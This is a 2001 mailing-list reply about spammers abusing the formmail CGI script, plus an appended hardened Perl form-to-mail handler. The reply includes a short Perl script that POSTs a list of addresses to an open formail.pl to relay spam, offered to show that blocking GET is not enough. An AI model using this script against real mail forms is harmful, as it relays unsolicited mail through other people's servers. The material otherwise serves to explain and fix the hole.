Re: spamming via formail.pl

From: Brian Hatch (focus-linux@ifokr.org)
Date: 09/26/01


Date: Tue, 25 Sep 2001 19:50:00 -0700
From: Brian Hatch <focus-linux@ifokr.org>
To: "Moeller, Arno" <am@bogs.de>
Subject: Re: spamming via formail.pl
Message-ID: <20010925195000.K598@ifokr.org>
> I've patched formmail in the following way to prevent this from
> happening and to log the spamming attempts:
>
> # Determine the form's REQUEST_METHOD (GET or POST) and split the form
> # fields up into their name-value pairs. If the REQUEST_METHOD was
> # not GET or POST, send an error.

Sure, that blocks GET, but it's really trivial to do a POST without
actually knowing how HTTP works. Curl will take form data to post,
for example, or you could use a few lines of perl (off the top of
my head, it may not be completely correct syntax):

#!/usr/bin/perl

use strict;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

my($ua) = LWP::UserAgent->new();

while (<>) {
        chomp;
        my($req) = POST "http://www.example.com/cgi-bin/formail.pl",
                [ to => $_,
                  from => "spammer@example.org",
                  ... ];
        # request() always returns a response object; check its status
        $ua->request($req)->is_success
                or print STDERR "Whoops, it didn't work for $_.\n";
}

and then run it with

        spammer$ perlscript < emailaddrs

(I don't actually remember the correct form variable names for formail,
but you get the idea.)

Yes, you could use the referer header to see if they're 'legit' but
we all know that's forgeable too. What you should do is hard code the
addr to which the mail goes in the formail.pl script, rather than
having it rely on form data. That way the worst the spammers can do
is target that one email address.

--
Brian Hatch                God be between you and harm,
   Systems and              in all the empty places
   Security Engineer        where you must walk.
www.hackinglinuxexposed.com

Every message PGP signed
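As an added example (not code from this thread or from formail.pl itself), here is one way to implement the hardening Brian recommends together with the logging Arno wanted: the recipient is fixed in the script, and any "to"-style field a client sends is only logged. The recipient address, log path and sendmail path are assumed placeholders; the CR/LF stripping and the list-form sendmail call are my additions, needed so the fixed recipient cannot be sidestepped through an injected header.

```perl
#!/usr/bin/perl
# Hardened form-to-mail handler (added example, not the original formail.pl).
# The destination address lives in the script, so a client cannot pick it;
# any "to"-style field a client sends is ignored and logged instead.
use strict;
use warnings;
use CGI;

my $RECIPIENT = 'webmaster@example.com';        # assumed placeholder address
my $ABUSE_LOG = '/var/log/formmail-abuse.log';  # assumed placeholder path
my $SENDMAIL  = '/usr/sbin/sendmail';           # assumed placeholder path

my $q = CGI->new;
print $q->header('text/plain');

# Accept POST only; anything else gets an error, as in the poster's patch.
if (($ENV{REQUEST_METHOD} // '') ne 'POST') {
    print "Error: this form must be submitted with POST.\n";
    exit 0;
}

# Log, then ignore, any attempt to steer the mail elsewhere.
for my $field (qw(to recipient cc bcc)) {
    my $value = scalar $q->param($field);
    next unless defined $value;
    if (open my $log, '>>', $ABUSE_LOG) {
        printf $log "%s %s sent %s=%s\n", scalar localtime,
            $ENV{REMOTE_ADDR} // '-', $field, $value;
        close $log;
    }
}

# Header values must stay on one line: strip CR/LF so a form field cannot
# smuggle extra headers (a Bcc:, say) past the fixed recipient.
sub header_safe {
    my $v = defined $_[0] ? $_[0] : '';
    $v =~ s/[\r\n]+/ /g;
    return $v;
}
my $from    = header_safe(scalar $q->param('email'));
my $subject = header_safe(scalar $q->param('subject')) || 'Web form submission';
my $body    = scalar $q->param('message') // '';
$from = 'nobody@example.com' unless $from =~ /^[^@\s]+@[^@\s]+$/;  # loose check

# List-form open: no shell involved, and the recipient comes from the script.
open my $mail, '|-', $SENDMAIL, '-oi', $RECIPIENT
    or die "cannot run sendmail: $!";
print $mail "To: $RECIPIENT\nReply-To: $from\nSubject: $subject\n\n$body\n";
close $mail;
print "Thanks, your message was sent.\n";
```

Note that `-t` is deliberately not passed to sendmail: with `-t` it would take recipients from the message headers, which is exactly the client-influenced path this script removes.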